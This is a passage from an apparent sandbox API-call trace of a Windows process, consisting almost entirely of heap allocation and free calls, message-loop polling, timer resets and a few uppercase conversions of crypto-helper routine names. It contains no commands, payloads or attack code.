| out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0203.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0203.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0203.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0203.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0203.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0203.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0203.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0203.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0203.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0x118a020 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0203.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0203.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0x1255020 [0203.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x118a020 | out: hHeap=0x970000) returned 1 [0203.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0203.414] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0203.414] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0203.414] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0203.414] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0203.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0203.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0203.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0203.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0203.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0203.414] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0203.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0203.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0203.415] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0203.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0203.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0203.416] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0203.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0203.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0203.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0203.417] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0203.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0203.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0203.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0203.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0203.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0203.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0203.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0x1180020 [0203.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0203.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0x1318020 [0203.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0203.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0203.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1180020 | out: hHeap=0x970000) returned 1 [0203.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0203.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0203.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0x1181020 [0203.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1318020 | out: hHeap=0x970000) returned 1 [0203.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d8) returned 0x1316020 [0203.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1181020 | out: hHeap=0x970000) returned 1 [0203.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0203.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0203.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0203.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x10c4020 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0203.585] HeapFree 